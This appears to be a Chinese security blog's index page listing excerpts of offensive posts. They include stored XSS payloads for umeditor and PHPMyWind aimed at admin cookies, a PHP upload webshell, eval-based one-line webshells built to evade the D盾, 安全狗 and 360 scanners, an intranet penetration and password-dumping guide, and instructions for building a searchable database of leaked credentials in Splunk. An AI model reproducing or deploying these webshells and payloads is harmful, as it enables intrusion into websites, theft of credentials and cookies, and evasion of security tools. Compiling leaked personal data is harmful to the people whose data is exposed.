umeditor储存型xss漏洞

源码下载链接:http://ueditor.baidu.com/website/download.html#mini ueditor文档:http://fexteam.gz01.bdysite.com/ueditor/#start-dir 功能简介    :http://ueditor.baidu.com/website/document.html 测试版本:umeditor1.2.3-utf8-php 根目录下:umeditor.config.js p:259-326 xss过滤的名单: https://raw.github……

Splunk搭建社工库

splunk:软件下载链接 1.导入数据库   导入数据库测试xls上传上去是16进制,不知道为什么。 可以设置默认配置,我这边选择数据库类型。 另存为可以直接添加数据库类型名称。   索引可以选择默认可以自己添加。 默认和自己添加搜索有区别。 默认搜索:可以直接搜索比如admin所有字段 添加搜索:比如我添加的……

splunk命令(持续更新)

最近用到了splunk记录一下怕以后忘记。。。。 PassWord password dest_ip=”172.16.1.222″ 查询 172.16.1.222 网段所有登录过的密码 username username dest_ip=”172.16.1.222″ 查询 172.16.1.222 网段所有登录过的用户名 username=xxx username可以指定用户查询 dest_ip=1.1.1.1 查询1.1.1.1所有……

内网渗透+基础+工具使用=自己理解

目录 1.代理 2.内网命令 3.抓密码 4.ipc$共享目录利用 5.端口漏洞 6.溢出 1.代理 端口转发工具有很多比如:rebind2  eDuh  ssock  reDuh  lcx  socks5 等…….. 下面介绍我比较喜欢的2款工具LCX+ socks5 1.lcx 路由器加端口 TCP协议 ,固定IP地址本机 大马设置 Local Ip : 转发ip Local Port : 转发端口 Remote Ip :本机i……

AG安全团队2017大型工具包

所谓大型工具包呢~ 就是非常大 覆盖很广 这次的工具包 为了更加全面的为广大朋友使用 编写了配套的帮助说明 这是这些年来没有的事 工具包为 音速启动 写的 我自己看着改了一哈  有不同的皮肤 你们看着 用 系统安全软件一直是我比较关注的 整理的工具比较到位~ 系统安全~硬件检测 行为监控 行为分析 敏感信息清理 防……

一个PHP上传小马

<?php header("content-Type: text/html; charset=utf-8"); ?> <? echo "</br>获取服务器IP地址: ".$_SERVER['HTTP_HOST']. "</br>获取服务信息: ".apache_get_version(); ?> <form method="POST"></br> shell路径: <input type="text" name="file" size="60" val……

cms指纹识别

无意看到这篇文章 https://forum.90sec.org/forum.php?mod=viewthread&tid=9803 感觉重复造轮子了。。。。。。。。 所以还是发出来吧! 首先看下界面吧 提交任务: Lib和static目录均是框架自带的.css和.js文件 Include目录下config.inc.php数据库配置文件 Sql文件打包,自行修改 登录账号baozi/baozi123   ……

过D盾,安全狗,一句话

其他waf 杀毒软件自己测试,我只测试了D盾,安全狗,360 D盾,360 <?php $a ="www.yuag.com"; function yuag($a){ eval($a); } @ yuag($_POST['yuag']); 密码:yuag 过D盾过安全狗 <?php error_reporting(0); $b="zxczxczxczxczxcxzczx"; function yuag_array($b,$c){ $b=strrev($b); print "www.yuag.……

phpmywind_5-3存储型xss

http://127.0.0.1/PHPMyWind_5.3/shoppingcart.php 留言板地址 以ing开头(可以是其他) “><img/src=x onerror=alert(2001)><“‘ 后台 127.0.0.1/PHPMyWind_5.3/admin/message.php 需要点击修改才可以弹XSS 如果管理员留言需要前台显示(或者回复)就必须点击修改。 ps:如果想打管理员cookie 就这个构造……